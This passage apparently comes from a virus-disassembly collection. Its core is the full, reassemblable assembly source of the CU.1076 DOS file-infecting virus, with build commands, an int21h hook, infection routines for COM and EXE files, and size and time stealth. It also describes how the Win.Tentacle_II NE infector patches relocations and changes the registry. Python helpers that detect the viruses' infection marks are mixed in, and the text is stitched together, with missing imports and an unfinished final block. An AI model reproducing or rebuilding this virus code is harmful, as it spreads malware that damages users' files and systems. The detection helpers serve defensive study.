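def analyse_pe_headers(data: bytes) -> dict:
    """Parse the DOS/PE headers of `data` and locate the entry point relative
    to the header area.  Raises ValueError if `data` is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("no PE signature at e_lfanew")
    file_hdr = e_lfanew + 4                          # IMAGE_FILE_HEADER
    opt = file_hdr + 20                              # IMAGE_OPTIONAL_HEADER
    if opt + 64 > len(data):
        raise ValueError("truncated PE header")
    nsections = struct.unpack_from("<H", data, file_hdr + 2)[0]
    opt_size = struct.unpack_from("<H", data, file_hdr + 16)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]     # AddressOfEntryPoint
    size_of_headers = struct.unpack_from("<I", data, opt + 60)[0]
    # End of the really used header: PE sig + FileHeader + OptionalHeader +
    # section table.  This is exactly the value the infect routine computes
    # (e_lfanew + 24 + SizeOfOptionalHeader + NumberOfSections*40).
    sect_table = opt + opt_size
    used = sect_table + nsections * SECTION_HEADER_SIZE
    if used > len(data):
        raise ValueError("section table runs past end of data")
    # Lowest section RVA: a legitimate entry point lies at or above it.
    first_section_rva = min(
        (struct.unpack_from("<I", data, sect_table + i * SECTION_HEADER_SIZE + 12)[0]
         for i in range(nsections)),
        default=size_of_headers,
    )
    return {
        "entry_rva": entry_rva,
        "used_headers": used,
        "size_of_headers": size_of_headers,
        "slack": size_of_headers - used,      # padding a cavity infector could use
        "entry_in_header": entry_rva < min(size_of_headers, first_section_rva),
        "entry_in_slack": used <= entry_rva < size_of_headers,
    }


def verdict(info: dict) -> str:
    """Human-readable conclusion from analyse_pe_headers()."""
    if info["entry_in_slack"]:
        return "SUSPICIOUS: entry point inside PE header padding (cavity infection?)"
    if info["entry_in_header"]:
        return "SUSPICIOUS: entry point below the first section"
    return "clean: entry point inside a section"


def build_sample_pe(entry_rva: int, size_of_headers: int = 0x200) -> bytes:
    """Constructed test vector: a minimal one-section PE32 header with no code.
    Only the fields analyse_pe_headers() reads are filled in."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    opt_size = 0xE0                                                # PE32
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                          # Magic: PE32
    struct.pack_into("<I", opt, 16, entry_rva)                     # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)     # ImageBase, alignments
    struct.pack_into("<I", opt, 60, size_of_headers)               # SizeOfHeaders
    section = bytearray(SECTION_HEADER_SIZE)
    section[:5] = b".text"
    struct.pack_into("<IIII", section, 8, 0x1000, 0x1000, 0x200, size_of_headers)
    image = dos + PE_SIGNATURE + file_hdr + opt + section
    return bytes(image.ljust(size_of_headers, b"\0"))


if __name__ == "__main__":
    # 0x1000 is a normal entry point; 0x160 is the first free byte after the
    # section table of the constructed image, i.e. where a cavity body would sit.
    for ep in (0x1000, 0x160):
        print(hex(ep), verdict(analyse_pe_headers(build_sample_pe(ep))))
```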
comment \

Name : CU.1076 (according to AVP, obviously named after the infection
: marker in the CRC field of the EXE header)
Author : ?
Type : TSR EXE/COM infector with size stealth
Size : 1076 bytes
Origin : ?
When : ?
Status : ?
Disassembled by : Black Jack

Description:
When an infected file is executed, the virus gains control and goes TSR by
the standard MCB method and hooks int21h. It then infects COM and EXE files
when they are executed or loaded by function 4Bh. The infection process is
100% standard. Date, time and attributes are stored (except that the seconds
field holds the infection mark 60), and a dummy int24h is installed during
infection. Also, the virus uses size stealth for FCB (functions 11h, 12h),
handle (functions 4Eh, 4Fh) and Win95 (functions 714Eh, 714Fh) searches, although
the handle stealth won't work because of lots of bugs. It also has a kind
of time stealth: on the get time function (5700h) it returns the seconds
field of the last infected file to hide its infection mark.

Comments:
This is just a stupid and boring DOS virus, I just disassembled it because
of great boredom and because I had found an infected file on my mother's PC
(but please don't ask me how it got there). It's full of bugs and rubbish.

Reassembly tested with Tasm 3.1 and TLink 3.0.

TASM /M cu
TLINK /t cu

\

virus_size = (v_end - v_start)

.model tiny
.286
.code
org 100h
start:
nop ; dummy host
nop
nop

v_start:
push es ; save PSP segment

call next ; calculate delta offset


next:
pop bp
sub bp,offset next ; BP=delta offset

mov ax,1818h ; already resident?


int 21h
cmp bx,0C001h
je already_resident ; yes, we're there

mov ax,ds ; AX=PSP segment


dec ax ; AX=MCB segment
mov ds,ax ; DS=MCB segment
mov cl,"M" ; marker: not the last MCB
xchg ds:[0],cl ; mark our MCB as not the last
sub word ptr ds:[3],40h ; resize MCB
sub word ptr ds:[12h],40h ; end segment of this program
mov bx,ds:[12h] ; BX=segment of new virus MCB
mov ds,bx ; DS=segment of new virus MCB
inc bx ; BX=segment of the virus
mov es,bx ; ES=segment of the virus
mov ds:[0],cl ; marker of virus MCB
mov word ptr ds:[1],8 ; mark as system MCB
mov word ptr ds:[3],3Fh ; set virus segment size in MCB

push cs ; DS=CS
pop ds
xor di,di ; DI=0
lea si,[bp+v_start] ; SI=start of virus code
mov cx,virus_size ; CX=size of virus
cld ; clear direction flag
rep movsb ; copy virus to TSR location

push es ; save virus segment

push es ; DS=ES=virus segment


pop ds

mov ax,3521h ; get int21h vector


int 21h
mov ds:[int21h_offset-v_start],bx ; save it
mov ds:[int21h_segment-v_start],es

pop es ; ES=virus segment

mov ax,2521h ; set new int21h vector


mov dx,(int21h_handler-v_start) ; DS:DX=new int handler
int 21h

already_resident:
pop es ; ES=PSP segment
push cs ; DS=CS
pop ds

cmp cs:[bp+host_type],"XE" ; is host an EXE?


je restore_exe

restore_com:
lea si,[bp+header] ; original first bytes of host
mov di,100h
cld ; clear direction flag
movsw ; move start of host back
movsb

push es ; DS=ES=PSP segment


pop ds
push 100h ; jump to host start
ret

restore_exe:
mov ax,es ; AX=ES=PSP segment
add ax,10h ; AX=start segment of image
push es ; DS=ES=PSP segment
pop ds
add word ptr cs:[bp+host_cs],ax ; relocate jump to host
add ax,word ptr cs:[bp+host_ss] ; relocate host SS
mov ss,ax ; restore host SS
mov sp,word ptr cs:[bp+host_sp] ; restore host SP

db 0EAh ; jmp far opcode


host_ip dw ?
host_cs dw ?

host_ss dw ?
host_sp dw ?

int21h_handler:
cmp ax,1818h ; residency check
jne no_residency_check
mov bx,0C001h ; we're already installed
iret ; quit interrupt execution

no_residency_check:
cmp ah,4Bh ; load/execute file
jne no_exec
jmp infect

no_exec:
cmp ah,11h ; FCB find first file?
je fcb_stealth
cmp ah,12h ; FCB find next file?
je fcb_stealth

cmp ah,4Eh ; handle find first file?


jne no_findfirst_handle
jmp handle_stealth
no_findfirst_handle:
cmp ah,4Fh ; handle find next file?
jne no_findnext_handle
jmp short handle_stealth
nop
no_findnext_handle:

cmp ax,714Eh ; LFN find first file?


jb no_LFN_stealth
cmp ax,714Fh ; LFN find next file?
ja no_LFN_stealth
jmp LFN_stealth

no_LFN_stealth:
cmp ax,5700h ; get file date/time?
jne org_int21h ; Jump if not equal
jmp time_stealth

org_int21h:
db 0EAh
int21h_pointer equ this dword
int21h_offset dw ?
int21h_segment dw ?

; ----- FCB STEALTH ---------------------------------------------------------


fcb_stealth:
pushf ; simulate int21h call
call dword ptr cs:[int21h_pointer-v_start]

pushf ; save flags


pusha ; save all regs
push ds ; save segments
push es

or al,al ; FCB search failed?


jnz exit_fcb_stealth ; if so, quit stealth routine

mov ah,51h ; get active PSP segment to BX


int 21h

mov es,bx ; ES=active PSP segment


cmp bx,es:[16h] ; is it COMMAND.COM calling?
jne exit_fcb_stealth ; if not, don't do stealth

mov ah,2Fh ; get DTA to ES:BX


int 21h

push es ; DS:BX=DTA
pop ds

cwd ; DX=0

cmp byte ptr [bx],0FFh ; is it an extended FCB?


jne no_extended_fcb
add bx,7 ; convert to regular FCB
no_extended_fcb:
mov cl,[bx+17h] ; CL=low byte of filetime
and cl,00011111b ; CL=seconds
cmp cl,1Dh ; seconds=60 means infected
jne exit_fcb_stealth ; if not, then exit stealth routine

mov ax,[bx+9] ; AX:CL=file extension


mov cl,[bx+1Bh]
cmp ax,"OC" ; is it a COM file?
jne fcb_stealth_no_com
cmp cl,"M"
jne exit_fcb_stealth ; its not an EXE/COM
jmp short do_fcb_stealth
nop
fcb_stealth_no_com:
cmp ax,"XE" ; is it an EXE file?
jne exit_fcb_stealth ; its not an EXE/COM
cmp al,"E"
jne exit_fcb_stealth ; its not an EXE/COM
do_fcb_stealth:
sub word ptr [bx+1Dh],virus_size ; stealth filesize
sbb word ptr [bx+1Ch],0 ; stealth filesize

exit_fcb_stealth:
pop es ; restore setment registers
pop ds
popa ; restore all regs
popf ; restore flags
retf 2 ; return from INT and keep the flags

; ----- HANDLE STEALTH ------------------------------------------------------


; note: this routine is much to buggy to work.

handle_stealth:
pushf ; push flags
call dword ptr cs:[int21h_pointer-v_start]
jc findfirstnext_failed
pushf ; save flags
pusha ; save all registers
push ds ; save segment registers
push es
push di ; save DI (useless)

mov ah,2Fh ; get DTA to ES:BX


int 21h
; BUG! DS should be set to ES here!!!

mov cl,[bx+16h] ; CL=low byte of filetime


and cl,00011111b ; CL=seconds of filetime
cmp cl,1Dh ; seconds=60 means infected
jne exit_handle_stealth

push si ; save SI (useless)


lea si,[bx+1Eh] ; ES:SI=filename
call get_extension ; get file extension to AX:CL
pop si ; restore SI

cmp ax, "OC" ; could it be a COM file?


jne handle_stealth_no_com ; check for an EXE
cmp cl,"M" ; really a COM?
jne exit_handle_stealth ; if not, exit stealth routine
jmp short do_handle_stealth
nop

handle_stealth_no_com:
cmp ax,"XE" ; could it be an EXE file?
jne exit_handle_stealth ; no EXE/COM, leave stealth routine
cmp cl,"E" ; really an EXE?
jne exit_handle_stealth ; no EXE/COM, leave stealth routine

do_handle_stealth:
sub word ptr es:[bx+1Ah],virus_size ; fixup filesize
; BUG! hiword of filesize unchanged!!!

exit_handle_stealth:
pop di ; restore DI
pop es ; restore segment registers
pop ds
popa ; restore all registers
popf ; restore flags

findfirstnext_failed:
retf 2 ; return from INT and keep the flags

; ----- LONG FILENAME (WIN95) STEALTH ---------------------------------------


LFN_stealth:
pushf ; simulate int21h call
call dword ptr cs:[int21h_pointer-v_start]
; ES:DI=finddata structure

pushf ; save flags


pusha ; save all regs
push ds ; save segments
push es

jc exit_lfn_stealth ; exit on error


nop
nop
push es ; DS=ES
pop ds

mov ax,si ; SI=DateTimeFormat


cmp ax,1 ; 1 means DOS format for date/time
je dos_datetime_format
nop
nop
mov ax,71A7h ; convert date/time format
xor bl,bl ; BL=0: Win95 format to DOS format
mov si,di
add si,14h ; DS:SI=ptr to filetime
pushf ; simulate int21h call
call dword ptr cs:[int21h_pointer-v_start]
; return CX=filetime, DX=filedate
jmp short filetime_in_CX
nop ; stupid single-pass assembler

dos_datetime_format:
mov cx,es:[di+14h] ; get filetime in CX
filetime_in_CX:
and cl,00011111b ; CL=file seconds
cmp cl,1Dh ; seconds=60 means infected
jne exit_lfn_stealth ; if not, exit stealth routine
nop
nop

push si ; save SI (useless)


lea si,[di+2Ch] ; DS:SI=filename ptr
call get_extension ; get filename extension to AX:CL
pop si ; restore SI

cmp ax,"OC" ; could it be a COM file?


jne lfn_stealth_no_com ; not a COM
nop
nop
cmp cl,"M" ; really a COM?
jne exit_lfn_stealth ; no COM/EXE, leave stealth routine
nop
nop
jmp short do_lfn_stealth
nop

lfn_stealth_no_com:
cmp ax,"XE" ; could it be an EXE file?
jne exit_lfn_stealth ; if not, leave stealth routine.
nop
nop
cmp cl,"E" ; is it really an EXE?
jne exit_lfn_stealth ; no COM/EXE, leave stealth routine
nop
nop

do_lfn_stealth:
sub word ptr es:[di+20h],virus_size ; fixup filesize
sbb word ptr es:[di+22h],0

exit_lfn_stealth:
pop es ; restore segment registers
pop ds
popa ; restore all registers
popf ; restore flags
retf 2 ; return from INT and keep the flags
; ----- GET THE FILE EXTENSION ----------------------------------------------
get_extension:
lodsb ; get a char from filename
cmp al,"." ; end of filename?
jne get_extension ; if not, search on

cld ; clear direction - useless here


lodsw ; get first 2 bytes of extension to AX
xchg cx,ax ; move them to CX
cld ; clear direction - useless again
lodsb ; get last byte of extension to AL
xchg cx,ax ; AX:CL=file extension
ret

; ----- TIME STEALTH --------------------------------------------------------


time_stealth:
pushf ; Push flags
call dword ptr cs:[int21h_pointer-v_start]

pushf ; save flags


pusha ; save all registers
push ds ; save segment registers
push es

and cl,00011111b ; CL=seconds of filetime


cmp cl,1Dh ; seconds=60 means infected
jne no_time_stealth
and cx,11100000b ; clear seconds of filetime
add cl,byte ptr cs:[seconds-v_start] ; set new seconds field
no_time_stealth:
pop es ; restore segment registers
pop ds
popa ; restore all registers
popf ; restore flags
retf 2 ; return from INT and keep the flags

; ----- INFECTION -----------------------------------------------------------


infect:
pusha ; save all registers
push ds ; save also segment registers
push es

push ds ; save DS (segm to filename)


xor ax,ax ; AX=0
mov ds,ax ; DS=AX=0=IVT segment
mov ax, offset int24h_handler ; BUG! forgotten to sub v_start
mov bx,cs ; BX:AX=ptr32 to int24h handler
cli ; disable interrupts
xchg ds:[24h*4],ax ; set new handler to int24h
xchg ds:[24h*4+2],bx
mov word ptr cs:[int24h_offset-v_start],ax ; save old
mov word ptr cs:[int24h_segment-v_start],bx ; handler
sti ; enable interrupts
pop ds ; restore DS (filename segm)

mov ax,4300h ; get attributes of victim


int 21h

push dx ; save filename pointer of


push ds ; victim file
push cx ; save attributes of victim

mov ax,4301h ; reset attributes of victim


xor cx,cx ; CX=new attributes=0
int 21h
jnc get_attributes_ok
jmp reset_attributes

get_attributes_ok:
mov ax,3D02h ; open file r/w
int 21h ; DS:DX=filename ptr
jnc openfile_ok
jmp reset_attributes

openfile_ok:
xchg bx,ax ; filehandle to BX

push cs ; DS=ES=CS
push cs
pop ds
pop es

mov ax,5700h ; get file date/time


int 21h
push cx ; save file time
push dx ; save file date

mov ah,3Fh ; read file header


mov dx, (header-v_start) ; DS:DX=buffer to read
mov cx,1Ch ; DOS EXE header size
int 21h

cmp word ptr cs:[header-v_start],"MZ" ; EXE header?


jne probably_not_an_exe
jmp infect_exe
probably_not_an_exe:
cmp word ptr cs:[2AEh],"ZM" ; EXE header?
jne not_an_exe
jmp infect_exe
not_an_exe:
cmp word ptr cs:[header-v_start], -1 ; SYS file?
jne infect_com
jmp restore_filetime

header db 1Ch dup(0C3h) ; 0C3h - ret opcode - quit 1st gen

infect_com:
mov ax,4202h ; goto end of file
xor cx,cx ; CX:DX=0=distance to move
cwd
int 21h

cmp dx,0 ; high word of filesize=0 ?


jbe com_size_ok ; if yes, file is too big
jmp restore_filetime ; to infect
com_size_ok:
push ax ; save filesize
sub ax,(virus_size+3) ; the theoretical offset of
; the jmp if file was infected
cmp ax,word ptr cs:[header-v_start+1] ; equal means
; the file is already infected
pop ax ; restore filesize in AX
jne com_not_infected_yet
jmp restore_filetime
com_not_infected_yet:
mov word ptr cs:[host_type-v_start],"OC" ; set host type
sub ax,3
mov word ptr cs:[jmp_distance-v_start],ax
add ax,3 ; completely useless instruction

mov ah,40h ; write virus body


mov dx,0 ; virus offset in memory
mov cx,virus_size ; CX=size to write
int 21h

mov ax,4200h ; set filepointer to beginning


xor cx,cx ; CX:DX=distance to move=0
cwd
int 21h

mov ah,40h ; write new jump to filestart


mov dx,(new_jmp-v_start) ; DS:DX=ptr to buffer
mov cx,3 ; write three bytes (near jmp)
int 21h

pop dx ; restore old file date in DX


pop cx ; restore old file time in CX
push cx ; save CX again
and cl,00011111b ; CL=seconds from filetime
mov byte ptr cs:[seconds-v_start],cl ; store it
pop cx ; restore CX
and cl,11100000b ; clear seconds from filetime
add cl,1Dh ; mark as infected with seconds=60
jmp set_filetime ; set new filetime

new_jmp:
db 0E9h
jmp_distance dw ?

infect_exe:
cmp word ptr cs:[header-v_start+18h],40h ; Relo table address
jb no_new_exe
jmp restore_filetime ; don't take New EXEs
no_new_exe:
cmp word ptr cs:[header-v_start+1Ah],0 ; Overlay number
je no_overlay
jmp restore_filetime ; don't take overlays
no_overlay:
cmp word ptr cs:[header-v_start+12h],"UC" ; CRC/infection mark
jne not_infected_yet
jmp restore_filetime ; don't reinfect
not_infected_yet:
mov word ptr cs:[host_type-v_start],"XE" ; mark host as EXE

mov ax,word ptr cs:[header-v_start+0Eh] ; save SS


mov cs:[host_ss - v_start],ax
mov ax,word ptr cs:[header-v_start+10h] ; save SP
mov cs:[host_sp - v_start],ax
mov ax,word ptr cs:[header-v_start+16h] ; save CS
mov cs:[host_cs - v_start],ax
mov ax,word ptr cs:[header-v_start+14h] ; save IP
mov cs:[host_ip - v_start],ax

mov ax,4202h ; go to end of file


xor cx,cx ; DX:CX=new file pointer
cwd
int 21h

push bx ; save file handle


push ax ; save filesize
push dx ; save filesize high

mov bx,word ptr cs:[header-v_start+08h] ; header size (paras)


shl bx,4 ; BX=BX*16 : convert to bytes
sub ax,bx ; DX:AX=image size
sbb dx,0
mov cx,10h ; divide by 16
div cx ; calculate new CS/IP
mov word ptr cs:[header-v_start+14h],dx ; IP
mov word ptr cs:[header-v_start+16h],ax ; CS
mov word ptr cs:[header-v_start+0eh],ax ; SS
mov word ptr cs:[header-v_start+10h],0FFFEh ; SP
mov word ptr cs:[header-v_start+12h],"UC" ; CRC/marker

pop dx ; restore filesize to DX:AX


pop ax
add ax,virus_size ; calculate new filesize
adc dx,0

mov cx,200h ; calculate filesize in 512 byte pages


div cx
inc ax ; round up pages
mov word ptr cs:[header-v_start+4],ax ; filesize mod 512
mov word ptr cs:[header-v_start+2],dx ; filesize div 512

pop bx ; restore file handle

mov ah,40h ; write virus to EOF file


mov cx,virus_size ; size to write
mov dx,0 ; virus offset in memory
int 21h

mov ax,4200h ; go to start of file


xor cx,cx ; DX:CX=new position in file=0
cwd
int 21h

mov ah,40h ; write new EXE header


mov dx, (header-v_start) ; DS:DX=buffer to read
mov cx,1Ch ; DOS EXE header size
int 21h

pop dx ; restore old file date in DX


pop cx ; restore old file time in CX
push cx ; save CX again
and cl,00011111b ; CL=seconds from filetime
mov byte ptr cs:[seconds-v_start],cl ; store it
pop cx ; restore CX
and cl,11100000b ; clear seconds from filetime
add cl,1Dh ; mark as infected with seconds=60
jmp set_filetime ; set new filetime
nop ; single-pass assembler shit

int24h_handler:
iret ; Interrupt return

int24h_offset dw ?
int24h_segment dw ?

restore_filetime:
pop dx ; restore old file date in DX
pop cx ; restore old file time in CX

set_filetime:
mov ax,5701h ; set file time/date
int 21h

mov ah,3Eh ; close file


int 21h

mov ax,5700h ; get file time/date


int 21h

reset_attributes:
pop cx ; restore old file attributes
pop ds ; restore pointer to filename
pop dx ; in DS:DX
mov ax,4301h ; set file attributes funct.
int 21h

xor ax,ax ; AX=0


mov ds,ax ; DS=AX=0=IVT segment
mov ax,word ptr cs:[int24h_offset-v_start] ; BX:AX=ptr32 to old
mov bx,word ptr cs:[int24h_segment-v_start] ; int24h handler
cli ; disable interrupts
mov ds:[24h*4],ax ; restore old int24h handler
mov ds:[24h*4+2],bx
sti ; enable interrupts

pop es ; restore segment registers


pop ds
popa ; restore all other registers
jmp org_int21h

host_type dw "OC" ; first generation is a COM


seconds db 0
v_end:

end start
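The infection marks the CU.1076 description and code above rely on (the seconds field of the DOS timestamp, the "CU" word in the EXE header checksum field, and the COM re-infection arithmetic) are exactly what a scanner can look for; the same seconds-field trick is used by the Stealth_Seconds routine at the start of this section. The following is an added example and not the disassembler's code: all constants come from the listing, the function names and the constructed header samples are mine.

```python
import struct

COM_VIRUS_SIZE = 1076        # body length, from the CU.1076 header above
CU_SECONDS_MARK = 0x1D       # value the virus puts into the 5-bit seconds field
STEALTH_SECONDS_MARK = 0x1E  # OR CL,(62/2) then DEC CX in Stealth_Set above: 60 s
CU_CRC_MARK = b"CU"          # the "UC" word at header+12h as it appears in the file


def seconds_field(dos_time: int) -> int:
    """5-bit seconds/2 field of a packed DOS time word (bits 0-4)."""
    return dos_time & 0x1F


def has_time_mark(dos_time: int, marks=(CU_SECONDS_MARK, STEALTH_SECONDS_MARK)) -> bool:
    """True if the seconds field equals one of the marker values.
    0x1D encodes 58 s, a legal value an ordinary file hits one time in 30, so
    on its own it is only a hint; 0x1E (60 s) lies outside the 0..29 range DOS
    normally writes and is a much stronger signal."""
    return seconds_field(dos_time) in marks


def exe_header_marked(data: bytes) -> bool:
    """MZ header whose checksum word (offset 12h) holds the "CU" mark."""
    return len(data) >= 0x1C and data[:2] == b"MZ" and data[0x12:0x14] == CU_CRC_MARK


def com_appender_marked(data: bytes) -> bool:
    """COM file whose initial JMP rel16 lands exactly COM_VIRUS_SIZE bytes before
    EOF: the same test the virus performs to avoid re-infection
    (jmp_distance == filesize - (virus_size + 3))."""
    if len(data) < COM_VIRUS_SIZE + 3 or data[0] != 0xE9:
        return False
    jmp_distance = struct.unpack_from("<H", data, 1)[0]
    return jmp_distance == len(data) - (COM_VIRUS_SIZE + 3)


def classify(name: str, data: bytes, dos_time: int) -> list:
    """Return the list of CU.1076 indicators found for one directory entry."""
    findings = []
    if has_time_mark(dos_time):
        findings.append("timestamp seconds field carries an infection mark")
    ext = name.lower().rsplit(".", 1)[-1]
    if ext == "exe" and exe_header_marked(data):
        findings.append('EXE checksum field = "CU"')
    if ext == "com" and com_appender_marked(data):
        findings.append("COM entry JMP targets EOF-1076 (appended body)")
    return findings


def dos_time(hour: int, minute: int, second: int) -> int:
    """Pack h:m:s into a DOS time word (seconds are stored halved)."""
    return (hour << 11) | (minute << 5) | (second // 2)


# Constructed samples: only the header bytes and timestamps matter, no code.
MARKED_EXE = b"MZ" + b"\0" * 16 + CU_CRC_MARK + b"\0" * 8     # 1Ch-byte header
CLEAN_EXE = b"MZ" + b"\0" * 26
MARKED_COM = b"\xE9" + struct.pack("<H", 1200 - (COM_VIRUS_SIZE + 3)) + b"\0" * 1197
CLEAN_COM = b"\xE9\x10\x00" + b"\0" * 1197

if __name__ == "__main__":
    for fname, blob, stamp in (("A.EXE", MARKED_EXE, dos_time(12, 34, 58)),
                               ("B.COM", MARKED_COM, dos_time(9, 0, 20)),
                               ("C.EXE", CLEAN_EXE, dos_time(12, 34, 56))):
        print(fname, classify(fname, blob, stamp) or ["no indicators"])
```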
comment %

Name : Win.Tentacle_II
Alias : Shell
Author : ?
Type : direct acting Win16 NE appender
Size : 10608 bytes virus body (because of relocation stuff
infected files increase for at least 10634 bytes)
Origin : ?
When : 1996
Status : was in the wild (distributed in sex newsgroups in 1996)
Disassembled by : Black Jack
Contact me : Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack

Description:
When the virus gets control, it searches for and infects NE EXE files:
first one *.EXE file in the current directory, then two in the C:\WINDOWS
directory, then one in each of several other hardcoded Windows directories
(C:\WIN, C:\WIN31, C:\WIN311, C:\WIN95), and finally one *.SCR file in the
current directory. Only files whose maxmem field in the DOS header (offset
0Ch) holds the standard value FFFFh are infected; the virus sets that field
to FFFEh in the infected image and uses it as its infection marker. During
infection the virus creates a temporary file C:\TENTACLE.$$$ and rebuilds an
infected image of the victim file there. When the infection process is
finished this file is copied back over the victim file and then deleted.
The infection technique is to add another segment containing the virus
code at the end of the file. To add its own entry to the segment table, it
checks whether there is enough unused room (at least 16 bytes) between the end
of the NE header tables and the start of the first segment and aborts the
infection if not. Then it shifts back all tables that follow the segment table
(overwriting the unused fill bytes) and fixes their offsets in the NE header,
so that it can write its own segment descriptor at the end of the segment
table. In a similar way it adds its own entries to the module-reference and
the imported-names tables (this is necessary to import the two APIs that are
used in the payload).
The most interesting feature of the virus is that it was one of the first (if
not the very first) viruses to use an EPO technique, i.e. it infects the file
without modifying its entry point. To do so, it searches the relocation
records of the code segment that contains the entry point for a call to the
INITTASK API from KERNEL or, if that is not found, the THUNRTMAIN API from
VBRUN300; these are APIs that are called at the very beginning of a program.
The relocation item belonging to that API call is then patched so that the
call is redirected to the virus.
While infecting, the virus pays special attention to WINHELP.EXE. In Win3.11
this file contains a self-check, so the virus patches it in a special way
that disables the self-check.
The payload is activated if the virus is run between 1:00am and 1:05am: the
virus drops a file C:\TENTACLE.GIF containing a picture of the purple tentacle
from the classic computer game "Day of the Tentacle" and modifies the
registry in such a way that whenever the program associated with .GIF files
is run to view such a file, it displays the file dropped by the virus. To do
so it uses the two imported APIs RegSetValue and RegQueryValue from SHELL.DLL.
If the virus is executed between 1:15am and 2:00am, it runs the opposite
effect and undoes the registry changes made by the payload.

Reassembly tested with Tasm 3.1 and TLink 3.0.

TASM /M tenta2
TLINK tenta2

The first-generation sample is a DOS EXE file and infects all suitable EXE
files in the current directory only.

%
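The following Python is an added analysis helper, not part of the virus source or of Black Jack's disassembly. It walks the same NE structures that infect_file rewrites and reports the file-level traces described above: the maxmem marker in the DOS header, the "SHELL" module reference appended as the last entry of the module-reference table, the extra segment with the hardcoded size and attributes, and the entry-segment relocation that the EPO engine turns from a KERNEL/VBRUN300 ordinal import into an internal reference to the virus segment. The NE images it checks are constructed inside the block (alignment shift 4, a six-byte host code segment, a NOP-filled stand-in for the virus body); those values, and the virus_entry offset of 2Eh derived from the segment layout at the top of the listing (8-byte descriptor copy, 12 pointer bytes, 2-byte count, three 8-byte records), are assumptions of the example, not data from the page.

```python
import struct

ALIGN_SHIFT = 4                # alignment shift of the constructed samples (assumption)
UNIT = 1 << ALIGN_SHIFT
VIRUS_SEG_SIZE = 10608         # "Size" in the header above
VIRUS_SEG_FLAGS = 0x1D50       # segm_attribs = 0001110101010000b
INFECTION_MARKER = 0xFFFE      # maxmem (DOS header offset 0Ch) after infection


def reloc(rtype, rflags, src_off, target):
    """One 8-byte NE relocation record: type, flags, source offset, 4-byte target."""
    return struct.pack("<BBH", rtype, rflags, src_off) + target


def build_ne(segments, modules, maxmem=0xFFFF):
    """Constructed minimal NE image (not a real host). segments: (code, flags, records);
    modules: imported module names in module-reference order. Table order is the one
    infect_file assumes: segment, resource, resident, module-ref, imported, entry."""
    imptab, modtab = b"\x00", b""
    for name in modules:
        modtab += struct.pack("<H", len(imptab))
        imptab += bytes([len(name)]) + name
    restab, enttab, nrestab = b"\x04TEST\x00\x00\x00", b"\x00", b"\x04desc\x00\x00\x00"
    ne_base, o_seg = 0x40, 0x40                    # segment table right after the NE header
    o_rsrc = o_res = o_seg + 8 * len(segments)     # empty resource table
    o_mod = o_res + len(restab)
    o_imp = o_mod + len(modtab)
    o_ent = o_imp + len(imptab)
    o_nres = o_ent + len(enttab)
    hdr_end = ne_base + o_nres + len(nrestab)
    first = pos = -(-hdr_end // UNIT) * UNIT       # first segment, aligned up
    segtab, body = b"", b""
    for code, flags, records in segments:
        blob = code + (struct.pack("<H", len(records)) + b"".join(records) if records else b"")
        segtab += struct.pack("<HHHH", pos // UNIT, len(code),
                              flags | (0x0100 if records else 0), len(code))
        blob += b"\x00" * (-len(blob) % UNIT)
        body += blob
        pos += len(blob)
    dos, ne = bytearray(64), bytearray(64)
    dos[:2], ne[:2] = b"MZ", b"NE"
    struct.pack_into("<H", dos, 0x0C, maxmem)
    struct.pack_into("<H", dos, 0x18, 0x40)        # reloc table at 40h: new-style EXE
    struct.pack_into("<I", dos, 0x3C, ne_base)
    struct.pack_into("<HH", ne, 0x04, o_ent, len(enttab))
    struct.pack_into("<HH", ne, 0x14, 0, 1)        # entry CS:IP = segment 1, offset 0
    struct.pack_into("<HHHHHHHH", ne, 0x1C, len(segments), len(modules), len(nrestab),
                     o_seg, o_rsrc, o_res, o_mod, o_imp)
    struct.pack_into("<I", ne, 0x2C, ne_base + o_nres)
    struct.pack_into("<H", ne, 0x32, ALIGN_SHIFT)
    hdr = bytes(dos + ne) + segtab + restab + modtab + imptab + enttab + nrestab
    return hdr + b"\x00" * (first - len(hdr)) + body


def inspect_ne(data):
    """Check an NE image for the traces the infection routine leaves behind."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    ne = struct.unpack_from("<I", data, 0x3C)[0]
    if data[ne:ne + 2] != b"NE":
        raise ValueError("not an NE executable")
    u16 = lambda off: struct.unpack_from("<H", data, ne + off)[0]
    cseg, cmod, align, entry_cs = u16(0x1C), u16(0x1E), u16(0x32), u16(0x16)
    segtab, modtab, imptab = u16(0x22), u16(0x28), u16(0x2A)
    seg = lambda i: struct.unpack_from("<HHHH", data, ne + segtab + 8 * (i - 1))  # 1-based
    r = {"maxmem_marker": struct.unpack_from("<H", data, 0x0C)[0] == INFECTION_MARKER}
    # the virus appends its module reference last and names the module "SHELL"
    last_mod = struct.unpack_from("<H", data, ne + modtab + 2 * (cmod - 1))[0]
    p = ne + imptab + last_mod
    r["shell_is_last_module"] = data[p + 1:p + 1 + data[p]] == b"SHELL"
    # the appended segment has the size and attributes hardcoded in the source
    _, size, flags, _ = seg(cseg)
    r["last_segment_is_virus"] = size == VIRUS_SEG_SIZE and flags == VIRUS_SEG_FLAGS
    # EPO: a 32-bit far pointer fixup in the entry code segment that is now an internal
    # reference into the last (virus) segment instead of an imported-ordinal reference
    off, size, flags, _ = seg(entry_cs)
    r["entry_reloc_patched"] = False
    if flags & 0x0100:                             # segment carries relocation records
        base = (off << align) + size
        count = struct.unpack_from("<H", data, base)[0]
        for i in range(count):
            rtype, rflags, _, tseg, _, _ = struct.unpack_from("<BBHBBH", data, base + 2 + 8 * i)
            if rtype == 3 and rflags & 3 == 0 and cseg > 1 and tseg == cseg:
                r["entry_reloc_patched"] = True
    r["infected"] = all(r.values())
    return r


# Constructed host: a far call through a fixup (0000:FFFF placeholder) to KERNEL.INITTASK.
HOST_CODE = b"\x9A\xFF\xFF\x00\x00\xCB"            # call far 0000:FFFF ; retf
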